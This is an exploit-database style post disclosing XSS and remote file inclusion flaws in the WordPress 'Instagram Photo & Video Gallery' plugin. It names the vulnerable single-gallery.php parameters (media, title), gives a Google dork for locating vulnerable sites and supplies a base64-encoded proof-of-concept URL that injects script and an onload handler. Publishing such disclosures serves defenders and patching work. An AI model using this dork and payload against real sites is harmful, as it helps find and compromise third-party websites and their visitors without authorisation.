Mgl-instagram-gallery Xss

\# Exploit Title:wordpress Instagram Photo & Video Gallery Multiple vulnerabilities # Google Dork: inurl:wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media= # Date:28/03/2016 # Author: khan 404 # Software Link: https://codecanyon.net/item/instagram-photo-video-gallery-wordpress/5281312 # Version: v2 # Category: webapps # CVE : NA # Tested on: xp,Firefox #Details: wordpress Instagram Photo & Video Gallery is vuln to xss and RFI vuln file:/mgl-instagram-gallery/single-gallery.php Vuln GET PARAMETERs : media= is vuln to RFI AND XSS & Title= is vuln to XSS information passed to parameters must be base64 encoded POC: wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media=aHR0cHM6Ly9mYmNkbi1kcmFnb24tYS5ha2FtYWloZC5uZXQvaHBob3Rvcy1hay14cGExL3QzOS4yMzY1LTYvODUxNTY1XzYwMjI2OTk1NjQ3NDE4OF85MTg2Mzg5NzBfbi5wbmcib25sb2FkPSJhbGVydCgnWFNTJyk=&title=PHNjcmlwdD5hbGVydCgndGVzdCcpOzwvc2NyaXB0Pg== Nice one Thanks :)